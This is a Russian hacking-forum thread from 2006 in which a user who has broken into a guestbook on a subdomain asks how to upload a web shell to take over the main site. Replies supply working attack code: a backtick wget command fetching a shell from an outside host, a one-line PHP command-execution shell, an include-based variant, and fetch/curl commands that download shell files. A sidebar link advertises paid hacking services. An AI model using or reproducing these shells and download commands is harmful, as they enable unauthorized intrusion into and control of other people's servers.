ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
Перезагрузить страницу Взломать весь сайт через отдельный поддомен
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Взломать весь сайт через отдельный поддомен
  #1  
Старый 31.01.2006, 20:56
Аватар для Monah IRH
Monah IRH
Новичок
Регистрация: 17.08.2005
Сообщений: 1
Провел на форуме:
3684

Репутация: 0
По умолчанию Взломать весь сайт через отдельный поддомен
Код:
<?
$open = fopen("/usr/local/psa/home/vhosts/sbmx.com.ru/subdomains/guest/httpdocs/script.php","w+");
	fwrite ($open,$_GET['fp']."\\n");
	fclose($open);
?>
Взломал Sad Raven GuestBook.
Получил пароль и логин админа.

Есть такая уязвимость там, что в дизайне сайта могут содержаться php-скрипты. Информация с http://xop0k.h15.ru/adv/3.txt

В общем пробовал загрузить туда маленький свой скриптик, который содержит форму загрузки файлов в себе.
Передаю то, что надо записывать через GET переменную fp.

Все бы было ок, да эта гостевуха экранирует слеши вот такие:
Код:
\
Как следствие нельзя записать в текстовой файл переменные в таком виде:
Код:
fwrite($fp, "\$text=\$_GET['fp']");
и это проблема. Не знаю как решить. Причем поставив один слеш при каждом сохранении они увеличиваются в геометрической прогрессии )

Вот думаю как ещё можно загрузить файлик со своего компа на сервер. Загрузить хочу шелл, чтобы получить доступ ко всему сайту, т.к. гостевуха нахзодится на отдельном домене guest.site.ru, а сайт находится на site.ru

Абсолютные пути известны
 
Ответить с цитированием

  #2  
Старый 31.01.2006, 21:19
Аватар для k1b0rg
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию
пишешь
`wget http://kobeluga.narod.ru/rst.php`;
и у тебя загрузиться шелл в папку с гуестой =)
по идее не должны `` экранироваться
 
Ответить с цитированием

  #3  
Старый 01.02.2006, 03:10
Аватар для grinay
grinay
IQ- 137%
Регистрация: 15.06.2004
Сообщений: 441
Провел на форуме:
1212666

Репутация: 662
Отправить сообщение для grinay с помощью ICQ
По умолчанию
Если у тебя есть возможность создать файл тогда пиши <?php system($_GET[cmd]);?>
или <?php include($_GET[open]);?>
В первом случае у тебя уже шелл во втором ты его можеш проинклудить и после выполнить то что сказал киборг если же это фря в гета там может и не быть тогда
fetch -o shell.php http://freeshell.ru/myshell.txt курл и гет
curl -o shell.php http://freeshell.ru/myshell.txt
get -o shell.php http://freeshell.ru/myshell.txt
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Могу взломать сайт, чат, мыло форум, вообщем все что ломается!!!За $$$ Макс307 Болталка 19 17.12.2005 20:00



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ